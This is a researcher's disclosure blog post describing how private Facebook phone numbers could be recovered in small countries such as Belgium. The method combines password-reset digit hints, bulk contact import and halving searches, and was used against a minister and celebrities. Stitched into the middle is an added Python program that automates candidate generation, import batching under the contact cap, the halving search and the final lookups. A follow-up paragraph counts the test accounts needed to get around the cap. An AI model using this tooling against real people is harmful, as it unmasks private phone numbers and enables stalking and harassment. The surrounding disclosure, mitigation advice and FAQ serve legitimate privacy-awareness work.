How to Find Your Friends Phone Numbers On Facebook

Don't have time to read the whole article? Skip to the FAQ section below for everything you need to know about how to find your friends' phone numbers on Facebook.

Update: someone pointed out that PayPal also exposes the last 4 digits of the phone number, so this technique might work for large countries too if the target has their phone number linked to their PayPal account.


Last month I found that it is fairly simple to expose private phone numbers on Facebook, and uncovered the phone numbers of several Belgian celebrities and politicians. Even though this technique only seems to work in small countries such as Belgium (roughly 11.2 million people), a significant number of people is affected by this simple yet effective privacy leak.

When I informed the great folks of the Facebook Security team of my concerns, I got a response I didn't quite expect:

When the "who can look me up by phone" setting is set to public, your phone number is public.

There are a few issues with this:

- The setting is set to public by default.
- It's confusing: even though the phone number on your profile is set to 'only me', the 'who can look me up' setting overrules it. While people believe their phone number is private, it's not:

This setting only indicates whether the phone number is visible on your profile. It does not indicate whether your phone number is public.

If this setting is set to 'Everyone', which is the default value, your phone number is considered public.

'Who can look me up' also implies that the person 'looking you up' already has your phone number. It means that someone is searching for your specific Facebook profile based on your phone number, and not the other way around.

- There is simply no 'only me' setting.

If you link your phone number to Facebook and want to lock down your privacy settings, you cannot prevent your 'friends' from still having access to it.
Despite sharing my concerns with the security team, they chose not to fix the issue. Even though I don't agree, I respect their decision. I did decide to write about it, though; I think people should know about it.

- Many people don't even know Facebook has their phone number. While Facebook cannot simply extract your phone number from your phone, it will repeatedly ask you to verify and save your number when you open Facebook on mobile. After a colleague removed his phone number following my findings, Facebook immediately asked him to re-enter it:

How it works

My technique uses Graph Search. Most people know that you can enter a phone number in Graph Search to get the corresponding user:

Simply checking every number is an impossible task that would take months. Facebook also has strong rate limiting in place that temporarily blocks further requests after roughly 1,000 lookups. Sure, you could use a botnet of legitimate Facebook accounts, but I'm sure Facebook has countermeasures for that, too.

STEP 1: The last two digits (1 minute)

I needed to find a way to test thousands of phone numbers at once. The fewer phone numbers I had to test, the faster I could get to the full number. To obtain the last two digits, I used Facebook's password reset functionality:

Facebook reveals the last two digits of the phone number of the Minister of Home Affairs, a high-ranking politician.
STEP 2: The provider number (5-35 minutes)
Here's the shape of a typical Belgian mobile number, 04PP XXXX YY, where X equals any digit from 0-9 and PP is the provider number. I have already filled in the last two digits (YY) we obtained in the previous step:

(Fewer than 400,000 possible numbers.)

Provider numbers are tied to the mobile phone operator:

Some provider numbers are more common than others. People working for the government most likely have a 047 number, as Proximus is the state-owned operator.

At this point, I wrote a program that would generate a contact list with every possible number starting with, say, 0479:

I then imported this list into the 'find friends' functionality and checked the suggested friends.

There were several "Jan"s in the list, but my target was not among them. Don't mind the '500' count; more contacts were imported than that.

No luck for 0478 either. I had to switch accounts at this point because Facebook only allows 20,000 contacts to be imported within a short time span. I logged into another test account, tried 0477 and got "third time lucky":

So at this point we can fill in the provider number:

We now have a list of 10,000 numbers, one of which is the minister's number.

STEP 3: Narrowing down (10-15 minutes)
The last part is just some simple math: we have 10,000 possible numbers left, so if we check half of them we can narrow the pool down to a handful of numbers. For instance:

0477 0000 50 to 0477 5000 50

The target was present in this range, which means the fifth digit is either 0, 1, 2, 3 or 4. 5,000 [0000 to 5000] possible numbers left.

Let's divide the remaining 5,000 numbers by two again.

Checking 0477 0000 50 to 0477 2500 50:

No luck with the 0000-2500 range, so we can be sure the phone number is in the 2500-5000 range. We have 2,500 numbers left; halving the pool each time leaves 1,250, 625, 313, 157, 79 and eventually 40 numbers. We could keep splitting the pool in half down to 20, 10 and 5 numbers, but with fewer than 50 numbers left you can also check each remaining number individually in Graph Search.

STEP 4: The final countdown (1 minute)
With only 40 possible phone numbers left, it is pretty easy to test every number still in the pool. Just enter them in the search bar until you hit the profile you were looking for.
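The four steps above, as an added worked example in Python. This is not the author's program; it is written here to show the mechanics of steps 2 to 4 offline. The contact file layout (a Name,Phone CSV), the `target_in_batch` callback standing in for the friend-import check, the `lookup` callback standing in for a manual Graph Search, and the demo target number are all assumptions; the 20,000-contact import cap and the 40-number manual threshold are the figures the post gives.

```python
import csv
import io
from typing import Callable, Iterable, List, Optional, Tuple

# Figures taken from the post: the per-account import cap that forced an
# account switch, and the pool size below which numbers were checked by hand.
IMPORT_LIMIT = 20000
MANUAL_THRESHOLD = 40


def candidates(provider_prefix: str, last_two: str) -> List[str]:
    """Step 2: build the 10,000-number pool 04PP XXXX YY for one provider prefix.

    provider_prefix is the four leading digits (e.g. '0477'); last_two are the
    digits leaked by the password-reset hint (e.g. '50'). The digit-count checks
    assume the 10-digit Belgian mobile format the post works with.
    """
    if len(provider_prefix) != 4 or not provider_prefix.isdigit():
        raise ValueError("provider prefix must be four digits, e.g. 0477")
    if len(last_two) != 2 or not last_two.isdigit():
        raise ValueError("last two digits must be two digits, e.g. 50")
    return [f"{provider_prefix}{middle:04d}{last_two}" for middle in range(10_000)]


def import_batches(numbers: List[str], limit: int = IMPORT_LIMIT) -> List[List[str]]:
    """Split a pool into batches no larger than the per-account import cap,
    so you know how many accounts a given search will cost."""
    return [numbers[i:i + limit] for i in range(0, len(numbers), limit)]


def contacts_csv(batch: Iterable[str], label: str = "Jan") -> str:
    """Render one batch as a Name,Phone CSV for a contact importer.

    The two-column layout is an assumption; the post does not say which
    contact file format it used.
    """
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["Name", "Phone"])
    for i, number in enumerate(batch):
        writer.writerow([f"{label} {i}", number])
    return out.getvalue()


def narrow_pool(pool: List[str], target_in_batch: Callable[[List[str]], bool],
                threshold: int = MANUAL_THRESHOLD) -> Tuple[List[str], int]:
    """Step 3: halve the pool until it is small enough to check by hand.

    target_in_batch(batch) stands in for the friend-import check: it returns
    True when the target profile shows up in the suggestions after importing
    that batch. Returns the remaining pool and the number of imports spent.
    """
    imports = 0
    while len(pool) > threshold:
        half = len(pool) // 2
        first_half = pool[:half]
        imports += 1
        pool = first_half if target_in_batch(first_half) else pool[half:]
    return pool, imports


def check_one_by_one(pool: List[str],
                     lookup: Callable[[str], bool]) -> Optional[str]:
    """Step 4: try each remaining number, as the post does in the Graph Search bar."""
    for number in pool:
        if lookup(number):
            return number
    return None


if __name__ == "__main__":
    # Constructed demo target; in the real procedure the callbacks are a human
    # reading the Facebook UI, not a local comparison.
    target = "0477123450"
    pool = candidates("0477", "50")
    print(f"{len(import_batches(pool))} import(s) needed for this prefix")
    left, imports = narrow_pool(pool, lambda batch: target in batch)
    found = check_one_by_one(left, lambda n: n == target)
    print(f"{imports} halvings narrowed 10,000 -> {len(left)}; found {found}")
```

Each 04PP prefix is one 10,000-number import, so the 20,000 cap means two provider prefixes per test account before switching, which is why the post needed a second account for 0477. From 10,000 down to 40 always takes eight halvings regardless of where the target sits, so the step 3 timing is dominated by how long each import takes to show suggestions, not by luck.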

I notified the minister about this privacy leak. In a statement he said he didn't know Facebook was leaking his phone number, but that he personally doesn't really mind as long as there's no abuse.

In cooperation with a local radio station we called another Belgian celebrity on air to inform him that I had found his phone number through Facebook. We had a good chat and he removed his phone number from Facebook right afterwards.


- What's the issue?
In small countries, phone numbers on Facebook are easily retrievable. Facebook argues that whenever the setting "who can look me up by phone number" is set to public (which is the default), your phone number is considered public (even though it is not displayed on your profile). This is confusing, and Facebook has too few measures in place to prevent it. Setting your phone number completely to 'only me' is simply not possible.

- Who is affected?
Anyone in a small country who (perhaps unknowingly) added their phone number and did not change the default setting. It is hard to give an exact list of affected countries, but if you have a 10-digit phone number and the set of provider numbers (the first digits) is rather limited, it should work.

- How can I check whether Facebook knows my phone number?
Go to your Facebook settings; all known phone numbers should be listed there.

- How can I check whether I'm affected?
(Only if you live in a country with a rather small population, like Belgium):
Check whether Facebook knows your phone number (see the question above).
Go to your privacy settings and check the setting "Who can look you up using the phone number you provided". If it's set to "Public", anyone could retrieve your phone number if the conditions above are met. If it's set to "Friends", only your friends can. Note that there's no "Only me" setting.

- How does it work?
The process consists of 4 steps and requires a program that can generate a specific range of phone numbers.
1. Getting the last two digits using the password reset (takes 2 minutes).
2. Getting the provider number (if any; this depends on luck and takes 15-35 minutes for a Belgian phone number) by generating a list of possible numbers and importing them through the 'find friends' functionality.
3. Narrowing down the pool by splitting it in half, by trial and error (15-20 minutes).
4. Testing the remaining numbers (about 40) manually in Graph Search (2 minutes).
It is hard to predict how long it takes to find a phone number, as it depends on the number of possible phone numbers, the requirements (test accounts, a phone number generator) and some luck. However, I think it's safe to say that in my tests it took only 30 to 60 minutes to crack most numbers.

- What can (or should) Facebook do about this?
It all boils down to informing people. The biggest problem is that most people don't know about this, as it is the default behaviour. Things would be different if the 'who can look me up' setting could be set to 'only me' (which doesn't exist yet) in the first place. Facebook could also hide the two digits revealed in a password reset request whenever the user does not regularly log in from that particular computer. They could also further limit the number of contacts you can import (I don't see why anyone would import 10,000 numbers at once).

- I'm affected. Should I remove my phone number?
That's a tough question, because phone numbers enable a good form of two-factor authentication, which is a recommended security measure. You can still restrict your 'who can look me up' setting to 'only friends'.

- I don't care that my phone number is public.
Good for you. I personally don't mind either, but I'm pretty sure others do. Most politicians and Belgian celebrities I contacted about this issue were grateful that I made them aware of it and removed their phone number right away.
Whether or not you care that your phone number is public doesn't really matter. To me, the more concerning part is that users seem to be misled by unclear privacy settings. If you set your phone number to 'only me', it shouldn't be overruled by some other default setting. It shows that despite its efforts, Facebook still faces some tough challenges regarding privacy and usability.

- Timeline
> Jan 9th, Me: Initial report to Facebook.
< Jan 9th, Facebook: Automated reply.
> Jan 9th, Me: Some additional information.
< Jan 9th, Facebook: "No concrete security or privacy impact."
> Jan 9th, Me: Are you sure? Additional information.
< Jan 10th, Facebook: Yes.
> Jan 12th, Me: Thanks, I don't agree but I respect the decision. (1/2)
> Jan 12th, Me: Asked if I can blog about it in February. (2/2)
< Jan 12th, Facebook: Further information (see the screenshot above).

- Are you mad at Facebook?
Not at all. Facebook has one of the best bug bounty programs and security teams available to hackers. I respect their decision, but I also believe it's our right to be informed of design choices that might impact our privacy.

- I found a vulnerability in Facebook. Where do I start?
Cool! Make sure you read their Bug Bounty Rules and are reporting a legitimate bug. After reporting the issue, they may choose to honour you in their Hall of Fame and reward you with a bounty starting at $500 USD.

- Who are you?
I'm Inti and I live in Oilsjt, Belgium, the country known for its beer, fries, chocolate and terrorists. As a kid, I was incredibly good at breaking stuff. I'm 21 now, a student, and still doing basically the same thing as an ethical hacker, with references such as Google, Facebook, Microsoft, Yahoo and so on. I don't really consider this a 'hack' or a 'vulnerability' though; more like a privacy issue people should know about.

- Other projects?
I recently hijacked a Trump tweet, made a project that highlights the scary side of Facebook Graph Search, and earlier wrote a similar blog post that eventually got Facebook to fix the issue it addressed.
